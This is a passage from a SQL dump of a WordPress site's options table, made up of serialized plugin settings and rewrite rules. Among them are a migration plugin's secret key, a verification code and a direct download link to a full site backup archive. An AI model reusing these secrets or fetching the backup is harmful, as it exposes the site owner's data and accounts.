us:\";s:24:\"sfsi_icons_DisplayCounts\";s:2:\"no\";s:12:\"sfsi_rectsub\";s:3:\"yes\";s:11:\"sfsi_rectfb\";s:3:\"yes\";s:11:\"sfsi_rectgp\";s:3:\"yes\";s:12:\"sfsi_rectshr\";s:2:\"no\";s:13:\"sfsi_recttwtr\";s:3:\"yes\";s:14:\"sfsi_rectpinit\";s:3:\"yes\";s:16:\"sfsi_rectfbshare\";s:3:\"yes\";s:24:\"sfsi_display_button_type\";s:17:\"responsive_button\";s:16:\"sfsi_share_count\";s:2:\"no\";s:30:\"sfsi_responsive_icons_end_post\";s:2:\"no\";s:21:\"sfsi_responsive_icons\";a:3:{s:13:\"default_icons\";a:3:{s:8:\"facebook\";a:3:{s:6:\"active\";s:3:\"yes\";s:4:\"text\";s:17:\"Share on Facebook\";s:3:\"url\";s:0:\"\";}s:7:\"Twitter\";a:3:{s:6:\"active\";s:3:\"yes\";s:4:\"text\";s:5:\"Tweet\";s:3:\"url\";s:0:\"\";}s:6:\"Follow\";a:3:{s:6:\"active\";s:3:\"yes\";s:4:\"text\";s:9:\"Follow us\";s:3:\"url\";s:0:\"\";}}s:12:\"custom_icons\";a:0:{}s:8:\"settings\";a:12:{s:9:\"icon_size\";s:6:\"Medium\";s:15:\"icon_width_type\";s:16:\"Fully responsive\";s:15:\"icon_width_size\";i:240;s:9:\"edge_type\";s:5:\"Round\";s:11:\"edge_radius\";i:5;s:5:\"style\";s:8:\"Gradient\";s:6:\"margin\";i:10;s:10:\"text_align\";s:8:\"Centered\";s:10:\"show_count\";s:2:\"no\";s:13:\"counter_color\";s:7:\"#aaaaaa\";s:16:\"counter_bg_color\";s:4:\"#fff\";s:16:\"share_count_text\";s:6:\"SHARES\";}}}\";','yes'),(344,'sfsi_section7_options','s:666:\"a:15:{s:15:\"sfsi_show_popup\";s:2:\"no\";s:15:\"sfsi_popup_text\";s:42:\"Enjoy this blog? Please spread the word :)\";s:27:\"sfsi_popup_background_color\";s:7:\"#eff7f7\";s:23:\"sfsi_popup_border_color\";s:7:\"#f3faf2\";s:27:\"sfsi_popup_border_thickness\";s:1:\"1\";s:24:\"sfsi_popup_border_shadow\";s:3:\"yes\";s:15:\"sfsi_popup_font\";s:26:\"Helvetica,Arial,sans-serif\";s:19:\"sfsi_popup_fontSize\";s:2:\"30\";s:20:\"sfsi_popup_fontStyle\";s:6:\"normal\";s:20:\"sfsi_popup_fontColor\";s:7:\"#000000\";s:17:\"sfsi_Show_popupOn\";s:4:\"none\";s:25:\"sfsi_Show_popupOn_PageIDs\";s:0:\"\";s:14:\"sfsi_Shown_pop\";s:8:\"ETscroll\";s:24:\"sfsi_Shown_popupOnceTime\";s:0:\"\";s:32:\"sfsi_Shown_popuplimitPerUserTime\";s:0:\"\";}\";','yes'),(345,'sfsi_feed_id','ZU51amp6ZFVCaFRLWXgxQko4d0NRRmZrTEV3MVJFVmc5YzhyUDhiNkh1bjM1ZHhnd1VxWlZZQWtSbjdnYzQ5clh2bTlFUTllWVdQMm1lMkZySGJlVktVWnU2ZlVuNmN5Qlk2SFpZclVtY0N2OTFCUk5vKzJhN09lL2xsRWNOd3l8am5mVklQNTk0YmRrTEVpWFhoaUpka3MyamdaQ1BidmQ4M0dnTnlvWG5uaz0=','yes'),(346,'sfsi_redirect_url','http://www.specificfeeds.com/widgets/emailSubscribeEncFeed/ZU51amp6ZFVCaFRLWXgxQko4d0NRRmZrTEV3MVJFVmc5YzhyUDhiNkh1bjM1ZHhnd1VxWlZZQWtSbjdnYzQ5clh2bTlFUTllWVdQMm1lMkZySGJlVktVWnU2ZlVuNmN5Qlk2SFpZclVtY0N2OTFCUk5vKzJhN09lL2xsRWNOd3l8am5mVklQNTk0YmRrTEVpWFhoaUpka3MyamdaQ1BidmQ4M0dnTnlvWG5uaz0=/OA==','yes'),(347,'sfsi_installDate','2018-04-02 08:45:18','yes'),(348,'sfsi_RatingDiv','no','yes'),(349,'sfsi_footer_sec','no','yes'),(350,'sfsi_activate','0','yes'),(352,'sfsi_instagram_sf_count','s:155:\"a:5:{s:4:\"date\";i:1522627200;s:13:\"sfsi_sf_count\";s:0:\"\";s:20:\"sfsi_instagram_count\";s:0:\"\";s:7:\"date_sf\";i:1522627200;s:14:\"date_instagram\";i:1522627200;}\";','yes'),(353,'widget_subscriber_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(354,'sfsi_pluginVersion','2.59','yes'),(355,'sfsi_serverphpVersionnotification','yes','yes'),(356,'show_premium_notification','no','yes'),(357,'show_notification','yes','yes'),(358,'show_mobile_notification','yes','yes'),(359,'sfsi_languageNotice','yes','yes'),(360,'sfsi_section8_options','s:1217:\"a:26:{s:20:\"sfsi_form_adjustment\";s:3:\"yes\";s:16:\"sfsi_form_height\";s:3:\"180\";s:15:\"sfsi_form_width\";s:3:\"230\";s:16:\"sfsi_form_border\";s:3:\"yes\";s:26:\"sfsi_form_border_thickness\";s:1:\"1\";s:22:\"sfsi_form_border_color\";s:7:\"#b5b5b5\";s:20:\"sfsi_form_background\";s:7:\"#ffffff\";s:22:\"sfsi_form_heading_text\";s:22:\"Get new posts by email\";s:22:\"sfsi_form_heading_font\";s:26:\"Helvetica,Arial,sans-serif\";s:27:\"sfsi_form_heading_fontstyle\";s:4:\"bold\";s:27:\"sfsi_form_heading_fontcolor\";s:7:\"#000000\";s:26:\"sfsi_form_heading_fontsize\";s:2:\"16\";s:27:\"sfsi_form_heading_fontalign\";s:6:\"center\";s:20:\"sfsi_form_field_text\";s:16:\"Enter your email\";s:20:\"sfsi_form_field_font\";s:26:\"Helvetica,Arial,sans-serif\";s:25:\"sfsi_form_field_fontstyle\";s:6:\"normal\";s:25:\"sfsi_form_field_fontcolor\";s:7:\"#000000\";s:24:\"sfsi_form_field_fontsize\";s:2:\"14\";s:25:\"sfsi_form_field_fontalign\";s:6:\"center\";s:21:\"sfsi_form_button_text\";s:9:\"Subscribe\";s:21:\"sfsi_form_button_font\";s:26:\"Helvetica,Arial,sans-serif\";s:26:\"sfsi_form_button_fontstyle\";s:4:\"bold\";s:26:\"sfsi_form_button_fontcolor\";s:7:\"#000000\";s:25:\"sfsi_form_button_fontsize\";s:2:\"16\";s:26:\"sfsi_form_button_fontalign\";s:6:\"center\";s:27:\"sfsi_form_button_background\";s:7:\"#dedede\";}\";','yes'),(361,'sfsi_verificatiom_code','kf9r1AtyFU75h2vflWAN','yes'),(362,'adding_tags','yes','yes'),(16801,'sfsi_pplus_error_reporting_notice_dismissed','1','yes'),(16802,'sfsi_section9_options','s:420:\"a:10:{s:20:\"sfsi_show_via_widget\";s:2:\"no\";s:23:\"sfsi_show_via_shortcode\";s:2:\"no\";s:24:\"sfsi_show_via_afterposts\";s:2:\"no\";s:16:\"sfsi_icons_float\";s:2:\"no\";s:24:\"sfsi_icons_floatPosition\";s:12:\"center-right\";s:26:\"sfsi_icons_floatMargin_top\";s:0:\"\";s:29:\"sfsi_icons_floatMargin_bottom\";s:0:\"\";s:27:\"sfsi_icons_floatMargin_left\";s:0:\"\";s:28:\"sfsi_icons_floatMargin_right\";s:0:\"\";s:23:\"sfsi_disable_floaticons\";s:2:\"no\";}\";','yes'),(16803,'sfsi_addThis_icon_removal_notice_dismissed','1','yes'),(16804,'ad_inserter_extract','a:15:{s:11:\"used_blocks\";s:30:\"a:3:{i:0;i:1;i:1;i:2;i:2;i:3;}\";s:8:\"features\";a:12:{i:57;b:0;i:6;b:0;i:7;b:0;i:29;b:0;i:31;b:0;i:9;b:0;i:26;b:0;i:53;b:0;i:46;b:0;i:33;b:0;i:37;b:0;i:39;b:0;}s:17:\"above_header_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:17:\"html_element_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:12:\"content_hook\";a:10:{i:0;a:2:{i:0;i:2;i:1;i:3;}i:3;a:0:{}i:4;a:1:{i:0;i:3;}i:6;a:1:{i:0;i:3;}i:5;a:0:{}i:1;a:0:{}i:2;a:2:{i:0;i:2;i:1;i:3;}i:7;a:0:{}i:8;a:0:{}i:10;a:2:{i:0;i:2;i:1;i:3;}}s:12:\"excerpt_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:15:\"loop_start_hook\";a:10:{i:0;a:1:{i:0;i:1;}i:3;a:1:{i:0;i:1;}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:1:{i:0;i:1;}i:7;a:0:{}i:8;a:0:{}i:10;a:1:{i:0;i:1;}}s:13:\"loop_end_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:13:\"the_post_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:20:\"before_comments_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:21:\"between_comments_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:19:\"after_comments_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:14:\"wp_footer_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:7:\"VERSION\";s:9:\"020605-96\";s:9:\"TIMESTAMP\";i:1613061596;}','yes'),(16814,'dst_notification_times','a:1:{s:11:\"ad-inserter\";i:1539933199;}','yes'),(33598,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:53:\"blogs/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:48:\"blogs/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:29:\"blogs/category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:41:\"blogs/category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:23:\"blogs/category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:50:\"blogs/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:45:\"blogs/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:26:\"blogs/tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:38:\"blogs/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:20:\"blogs/tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:51:\"blogs/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:46:\"blogs/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:27:\"blogs/type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:39:\"blogs/type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:21:\"blogs/type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:53:\"blogs/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:48:\"blogs/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:29:\"blogs/author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:41:\"blogs/author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:23:\"blogs/author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:75:\"blogs/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:70:\"blogs/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:51:\"blogs/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:63:\"blogs/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:45:\"blogs/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:62:\"blogs/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:57:\"blogs/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:38:\"blogs/([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:50:\"blogs/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:32:\"blogs/([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:49:\"blogs/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:44:\"blogs/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:25:\"blogs/([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:37:\"blogs/([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:19:\"blogs/([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:33:\"blogs/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"blogs/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"blogs/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"blogs/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"blogs/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"blogs/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:22:\"blogs/([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:26:\"blogs/([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:46:\"blogs/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:41:\"blogs/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:34:\"blogs/([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:41:\"blogs/([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:30:\"blogs/([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:22:\"blogs/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:32:\"blogs/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:52:\"blogs/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"blogs/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"blogs/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:28:\"blogs/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(63998,'sfsi_custom_icons','yes','yes'),(64010,'wp-optimize-schedule','true','yes'),(64011,'wp-optimize-last-optimized','Never','yes'),(64012,'wp-optimize-schedule-type','wpo_fortnightly','yes'),(64013,'wp-optimize-retention-enabled','false','yes'),(64014,'wp-optimize-retention-period','2','yes'),(64015,'wp-optimize-enable-admin-menu','false','yes'),(64016,'wp-optimize-total-cleaned','0','yes'),(64017,'wp-optimize-auto','a:7:{s:9:\"revisions\";s:4:\"true\";s:6:\"drafts\";s:4:\"true\";s:5:\"spams\";s:4:\"true\";s:9:\"transient\";s:5:\"false\";s:8:\"optimize\";s:5:\"false\";s:10:\"unapproved\";s:5:\"false\";s:5:\"trash\";s:4:\"true\";}','yes'),(64018,'wp-optimize-settings','a:16:{s:16:\"user-commentmeta\";s:5:\"false\";s:14:\"user-revisions\";s:5:\"false\";s:11:\"user-drafts\";s:5:\"false\";s:15:\"user-orphandata\";s:5:\"false\";s:14:\"user-pingbacks\";s:5:\"false\";s:13:\"user-postmeta\";s:5:\"false\";s:17:\"user-repairtables\";s:5:\"false\";s:16:\"user-attachments\";s:5:\"false\";s:10:\"user-spams\";s:5:\"false\";s:14:\"user-transient\";s:5:\"false\";s:13:\"user-optimize\";s:5:\"false\";s:15:\"user-unapproved\";s:5:\"false\";s:15:\"user-trackbacks\";s:5:\"false\";s:10:\"user-trash\";s:5:\"false\";s:19:\"user-orphanedtables\";s:5:\"false\";s:13:\"last_saved_in\";s:6:\"3.0.16\";}','yes'),(64019,'wpo_update_version','3.1.4','yes'),(64020,'updraft_task_manager_dbversion','1.1','yes'),(64023,'wp-optimize-corrupted-tables-count','0','yes'),(64025,'wp-optimize-is_gzip_compression_enabled','gzip','yes'),(64026,'wp-optimize-enable-auto-backup','false','yes'),(64027,'wp-optimize-logging','','yes'),(64028,'wp-optimize-logging-additional','','yes'),(64029,'wp-optimize-enable-db-force-optimize','false','yes'),(64032,'wpo_cache_config','a:15:{s:19:\"enable_page_caching\";s:1:\"0\";s:23:\"page_cache_length_value\";i:24;s:22:\"page_cache_length_unit\";s:5:\"hours\";s:17:\"page_cache_length\";i:86400;s:20:\"cache_exception_urls\";a:1:{i:0;s:0:\"\";}s:23:\"cache_exception_cookies\";a:1:{i:0;s:0:\"\";}s:30:\"cache_exception_browser_agents\";a:1:{i:0;s:0:\"\";}s:22:\"enable_sitemap_preload\";b:0;s:23:\"enable_schedule_preload\";s:1:\"0\";s:21:\"preload_schedule_type\";s:22:\"wpo_use_cache_lifespan\";s:21:\"enable_mobile_caching\";s:1:\"0\";s:19:\"enable_user_caching\";s:1:\"0\";s:8:\"site_url\";s:31:\"http://www.westonspirit.org.uk/\";s:17:\"wpo_cache_cookies\";a:0:{}s:25:\"wpo_cache_query_variables\";a:0:{}}','yes'),(64033,'wp-optimize-install-or-update-notice-version','1.1','yes'),(64034,'ai-notice-review','no','yes'),(64035,'dst_optin_tracking','a:1:{s:11:\"ad-inserter\";i:0;}','yes'),(64036,'dst_optin_newsletter','a:1:{s:11:\"ad-inserter\";i:0;}','yes'),(64038,'dismissed_update_core','a:1:{s:11:\"5.3.2|en_GB\";b:1;}','no'),(85063,'ai1wm_secret_key','HwJkFmHQuK0Q','yes'),(85066,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:351:\"<a href=\"http://www.westonspirit.org.uk/wp-content/ai1wm-backups/www.westonspirit.org.uk-20201009-120342-0x7kk5.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"www.westonspirit.org.uk\" download=\"www.westonspirit.org.uk-20201009-120342-0x7kk5.wpress\"><span>Download www.westonspirit.org.uk</span><em>Size: 70 MB</em></a>\";}','yes'),(85069,'_transient_wpo_get_cache_size','a:2:{s:4:\"size\";i:0;s:10:\"file_count\";i:0;}','yes'),(85070,'wp-optimize-compression_server','resmushit','yes'),(85071,'wp-optimize-lossy_compression','1','yes'),(85072,'wp-optimize-back_up_original','1','yes'),(85073,'wp-optimize-back_up_delete_after','1','yes'),(85074,'wp-optimize-back_up_delete_after_days','50','yes'),(85075,'wp-optimize-autosmush','1','yes'),(85076,'wp-optimize-image_quality','95','yes'),(85077,'wp-optimize-show_smush_metabox','show','yes'),(85078,'Re_Smush_It_Task','1602244962','yes'),(85082,'wp-optimize-completed_task_count','41','yes'),(85083,'wp-optimize-total_bytes_saved','2883642','yes'),(85084,'wp-optimize-total_percent_saved','5.7707317073171','yes'),(85085,'ai1wm_updater','a:0:{}','yes'),(85091,'sfsi_dismiss_sharecount','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85092,'sfsi_dismiss_google_analytic','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85093,'sfsi_dismiss_woocommerce','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85094,'sfsi_dismiss_twitter','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85095,'sfsi_banner_global_firsttime_offer','s:104:\"a:3:{s:12:\"met_criteria\";s:3:\"yes\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:19:\"2020-10-09 12:00:33\";}\";','yes'),(85096,'sfsi_dismiss_gdpr','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85097,'sfsi_dismiss_optimization','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85098,'sfsi_dismiss_gallery','s:58:\"a:2:{s:11:\"show_banner\";s:3:\"yes\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85099,'sfsi_banner_global_upgrade','s:105:\"a:3:{s:12:\"met_criteria\";s:3:\"yes\";s:9:\"is_active\";s:3:\"yes\";s:9:\"timestamp\";s:19:\"2020-10-23 12:00:34\";}\";','yes'),(85100,'sfsi_banner_global_http','s:115:\"a:4:{s:12:\"met_criteria\";s:2:\"no\";s:15:\"banner_appeared\";s:2:\"no\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85101,'sfsi_banner_global_gdpr','s:115:\"a:4:{s:12:\"met_criteria\";s:2:\"no\";s:15:\"banner_appeared\";s:2:\"no\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85102,'sfsi_banner_global_shares','s:115:\"a:4:{s:12:\"met_criteria\";s:2:\"no\";s:15:\"banner_appeared\";s:2:\"no\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85103,'sfsi_banner_global_load_faster','s:115:\"a:4:{s:12:\"met_criteria\";s:2:\"no\";s:15:\"banner_appeared\";s:2:\"no\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85104,'sfsi_banner_global_social','s:115:\"a:4:{s:12:\"met_criteria\";s:2:\"no\";s:15:\"banner_appeared\";s:2:\"no\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85105,'sfsi_banner_global_pinterest','s:115:\"a:4:{s:12:\"met_criteria\";s:2:\"no\";